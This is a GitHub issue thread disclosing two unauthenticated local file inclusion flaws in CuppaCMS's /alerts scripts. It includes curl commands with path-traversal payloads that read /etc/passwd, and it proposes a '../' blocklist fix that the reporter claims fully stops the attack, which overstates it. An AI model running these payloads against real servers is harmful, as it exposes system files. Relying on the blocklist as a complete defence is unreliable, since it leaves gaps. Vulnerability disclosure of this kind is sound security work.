Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Multiple non authenticated local file inclusions found in /alerts #15

Open
hansmach1ne opened this issue Jan 4, 2022 · 2 comments
Open

Comments

@hansmach1ne
Copy link

Greetings, I found a LFI vulnerability in CuppaCMS. How is disclosure process exactly done. Can you provide me an email where I can contact you with the details.

@hansmach1ne hansmach1ne changed the title Non authenticated local file inclusion Multiple non authenticated local file inclusions found Jan 4, 2022
@hansmach1ne
Copy link
Author

Since, everybody is publicly exposing vulnerabilities. I am going to assume, there is no advisory or disclosure policy.

Details:
Multiple Local File Inclusion vulnerabilities have been found in CuppaCMS /alerts scripts.

  1. '/alerts/alertConfigField.php' script suffers from Local File Inclusion vulnerability using $_POST['urlConfig'] parameter. I can see there is a history with similar vulnerability in the same script, but it is not fixed properly. Parameter should be further sanitized.
    Replication: Use: curl -X POST "http://IP/CuppaCMS/alerts/alertConfigField.php" -d "urlConfig=../../../../../../../../../etc/passwd

  2. '/alerts/alertLightbox.php' script suffers from Local FIle Inclusion vulnerability using $_POST['url'] parameter. Parameter should be sanitized.
    Replication: Use: curl -X POST "http://IP/CuppaCMS/alerts/alertLightbox.php" -d "url=../../../../../../../../../etc/passwd"

PoC:
image

Reference and proof of concept: https://github.com/hansmach1ne/MyExploits/tree/main/Multiple_LFIs_in_CuppaCMS_alerts
Disclosure date: 4th January, 2022
Author: Mateo Hanžek

@hansmach1ne hansmach1ne changed the title Multiple non authenticated local file inclusions found Multiple non authenticated local file inclusions found in /alerts Jan 6, 2022
@hansmach1ne
Copy link
Author

hansmach1ne commented Jan 8, 2022

@tufik2 These two vulnerabilities have pretty high severity and should be fixed ASAP.
This is my possible solution for these security issues, sanitization of $_POST variables against path truncation attack.

  1. Script 'alerts/alertConfigField.php', line 77. My suggestion is to add the following:

$url = $_POST['urlConfig'];
if (strstr($url, "../") || strstr($url, "..\\")) {
echo "Security attack!";
exit;
}
include "../components/table_manager/fields/config/". $url ?>

  1. Script 'alerts/alertLightbox.php ', line 113. My suggestion is to add the following:
    $url = $_POST['url'];
    if (strstr($url, "../") || strstr($url, "..\\")) {
    echo "Security attack!";
    exit;
    }
    include $cuppa->getDocumentPath(). $url;

This will completely neutralize any sort of path truncation LFI attack in these 2 parameters.
Hope this helped, I would like to report this to mitre for a CVE ID, after a patch. Looking forward to your response.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant